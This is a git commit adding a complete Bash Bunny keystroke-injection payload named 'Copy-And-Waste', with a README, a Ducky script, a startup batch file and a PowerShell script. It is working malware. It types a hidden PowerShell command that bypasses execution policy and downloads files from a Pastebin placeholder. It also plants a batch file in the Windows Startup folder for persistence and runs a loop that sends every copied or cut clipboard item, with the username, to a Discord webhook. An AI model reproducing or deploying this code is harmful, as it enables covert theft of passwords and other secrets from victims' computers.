Add files via upload

BashBunny/payloads/Copy-And-Waste/I.bat

@@ -0,0 +1,3 @@
+@echo off
+powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
+pause

BashBunny/payloads/Copy-And-Waste/README.md

@@ -0,0 +1,119 @@
+<img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/caw.png" width="200">
+
+<h1 align="center">
+  <a href="https://git.io/typing-svg">
+    <img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+;Copy+And+Waste!+😈&center=true&size=30">
+  </a>
+</h1>
+
+<!-- TABLE OF CONTENTS -->
+<details>
+  <summary>Table of Contents</summary>
+  <ol>
+    <li><a href="#Description">Description</a></li>
+    <li><a href="#getting-started">Getting Started</a></li>
+    <li><a href="#Contributing">Contributing</a></li>
+    <li><a href="#Version-History">Version History</a></li>
+    <li><a href="#Contact">Contact</a></li>
+    <li><a href="#Acknowledgments">Acknowledgments</a></li>
+  </ol>
+</details>
+
+# Copy-And-Waste
+
+A payload to exfiltrate clipboard contents
+
+## Description
+
+This payload uses iwr to download 2 files 
+* I.bat
+* c.ps1
+
+**I.bat** is downloaded to the startup folder to maintain persistance and execute c.ps1 on reboot/startup
+
+**c.ps1** will sit in AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X click 
+
+Then the contents will then be sent to the discord webhook for viewing pleasure
+
+For killing the script press both Ctrl buttons at the same time [It will resume at reboot]
+
+
+## Getting Started
+
+### Dependencies
+
+* Pastebin or other file sharing service, Discord webhook or other webhook service
+* Windows 10,11
+* [Here](https://support.discord.com/hc/en-us/articles/228383668-Intro-to-Webhooks) is a tutorial on how to use Discord webhooks 
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+### Executing program
+
+* Plug in your device
+* Device will download both files and place them in proper directories to then run the script
+```
+powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
+```
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Contributing
+
+All contributors names will be listed here:
+
+[atomiczsec](https://github.com/atomiczsec) &
+[I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Version History
+
+* 0.1
+    * Initial Release
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- CONTACT -->
+## Contact
+
+<h2 align="center">📱 My Socials 📱</h2>
+<div align=center>
+<table>
+  <tr>
+    <td align="center" width="96">
+      <a href="https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
+      </a>
+      <br>YouTube
+    </td>
+    <td align="center" width="96">
+      <a href="https://twitter.com/atomiczsec">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
+      </a>
+      <br>Twitter
+    </td>
+    <td align="center" width="96">
+      <a href="https://discord.gg/MYYER2ZcJF">
+        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
+      </a>
+      <br>I-Am-Jakoby's Discord
+    </td>
+  </tr>
+</table>
+</div>
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- ACKNOWLEDGMENTS -->
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+<p align="right">(<a href="#top">back to top</a>)</p>

BashBunny/payloads/Copy-And-Waste/c.ps1

@@ -0,0 +1,36 @@
+Add-Type -AssemblyName WindowsBase
+Add-Type -AssemblyName PresentationCore
+
+function dischat {
+
+  [CmdletBinding()]
+  param (    
+  [Parameter (Position=0,Mandatory = $True)]
+  [string]$con
+  ) 
+
+  $hookUrl = 'YOUR DISCORD WEBHOOK'
+
+$Body = @{
+  'username' = $env:username
+  'content' = $con
+}
+
+
+Invoke-RestMethod -Uri $hookUrl -Method 'post' -Body $Body
+
+}
+
+
+dischat (get-clipboard)
+
+while (1){
+    $Lctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::'LeftCtrl')
+    $Rctrl = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::RightCtrl)
+    $cKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::c)
+    $xKey = [Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::x)
+
+       if (($Lctrl -or $Rctrl) -and ($xKey -or $cKey)) {dischat (Get-Clipboard)}
+       elseif ($Rctrl -and $Lctrl) {dischat "---------connection lost----------";exit}
+       else {continue}
+} 

BashBunny/payloads/Copy-And-Waste/payload.txt

@@ -0,0 +1,17 @@
+REM     Title: Copy-And-Waste
+
+REM     Author: atomiczsec & I am Jakoby
+
+REM     Description: This payload is meant to exfiltrate whatever is copied to the clipboard and sends to a discord webhook
+
+REM     Target: Windows 10, 11
+
+DELAY 2000
+GUI
+DELAY
+STRING powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1"" 
+ENTER
+
+REM     Remember to replace the link with your pastebin shared link for the intended files to download
+REM     Also remember to put in your discord webhook in c.ps1
+REM     For the PASTEBIN LINK's do not put https:// infront of it, it should look like pastebin.com/raw/BLAHBLAHBLAH